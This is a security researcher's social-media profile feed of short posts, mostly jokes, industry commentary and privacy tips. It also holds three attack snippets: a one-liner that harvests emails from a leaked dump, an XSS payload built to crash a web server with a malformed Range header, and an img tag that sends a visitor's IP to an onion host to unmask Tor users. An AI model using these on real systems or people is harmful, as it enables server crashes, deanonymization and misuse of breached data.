Opens profile photo
Follow
Robert Hansen
@RSnake
Deputy CTO, vCISO, defender of others' privacy, AI hacker, Advisor, often found joking.
Science & Technologyrsnake.comJoined July 2008

Robert Hansen’s posts

Hacker life be like: gzcat dump.gz |cut -f 1 -d “:” |tr ‘[[:upper:]]’ ‘[[:lower:]]’ |egrep “^[a-z0-9\-]+.*@.+” |sort |uniq > emails.txt
4
174
XSS BSOD <script>var c=new XMLHttpRequest();c.open('GET','/');c.setRequestHeader('Range','bytes=18-18446744073709551615');c.send();</script>
3
115
Detecting Tor users can be as simple as putting up a Tor hidden service and linking to it: <img src=“//[whatever].onion/?[user-ip-address]”>
1
70
I hung out with someone who got the COVID vaccine and I’m sad to report my 5g cell phone reception has not improved at all.
3
59
Venezuela’s Bolivars are worth so little they may start causing issues with exchanges who round to the nearest fraction of pennies.
Image
6
43
PSA - the command to detach a GNU screen (Control-A Control-D) is the same command in Outlook that selects all your email... and then deletes all of your email. Fun times.
9
44
If you use Firefox, type about:config click through type privacy.trackingprotection.enabled and change the value to “true”
1
41
Whew! What a ride!!
Quote
We have officially acquired @BitDiscovery, a leader in external #attacksurface management (EASM). Paired with our market-leading solutions, customers will have a comprehensive view into known and previously unknown internet-facing assets. tenable.com/press-releases
Image
6
36
I’d expect huge layoffs tomorrow (Friday). Be nice to everyone. The chances are a lot of people and their families are going to have a very rough day tomorrow. #COVID19
1
31
Extremely accurate drone strike with a grenade. Pretty impressive delivery mechanism for tight seemingly impenetrable/austere conditions.
Quote
Ho Ho Ho! #MeryChristmas #WesołychŚwiąt 🎁💥 Throwing gifts into the chimney of Russian invaders by Ukrainian defenders. #Ukraine #GloryToUkraine
2
31
PSA: Updating your phone and all apps before going to Blackhat/DefCon/BSidesLV is a good idea. Or better yet, don't bring them at all.
3
27
Regarding breach disclosure: it occured to me that companies could use the spammiest looking content with the worst keywords from the shadiest RBL IP ranges and send it out as fast as possible so that it gets caught by anti-spam filters.
2
24
“You don’t want a doctor to have to go through a forgot password flow with a patient on the table.” “I’d hate to see a corpse with it’s privacy intact.” Wrt optimizing for human life over privacy -
3
22
Wow - this could get very interesting for the pen testing/assessment industry. Banks sue Trustwave for Target breech: http://t.co/D0moZ59xZg
17
21
Don’t forget to block those site/ad trackers, kids. Google Analytics especially.
Quote
Google's tracking has grown since the GDPR came into force while its smaller rivals have been obliterated. cliqz.com/en/magazine/st
Image
1
23
News Outlets, “Bad actors are trying to make money off of the coronavirus crisis.” Also News Outlets, “You can’t see our clickbait until you enable ads.”
1
20
I think this inadvertently proved using Stripe is risky business.
Quote
Today @stripe blocked our account and hold all the money that we charged via @backerkit for shipping of #FlipperZero. Explaining this by the fact that we have a “risky business”. Pretty weird considering that Stripe already processed all our Kickstarter payments before.
Image
2
21
Replying to
One of the worst parts about this for me isn’t that it happened, or what it implies, but how common this kind of spaghetti coding is becoming. He names almost every modern language and tons of frameworks. Try threat modeling that mess.
17
Once upon a time a boss of mine asked me if I got an email an executive had sent but I wasn’t certain. So he asked one of my co-workers who was sitting next to me to forward it over. Sure enough I had gotten it but when I was looking at the two emails side by side they seemed…
Image
2
20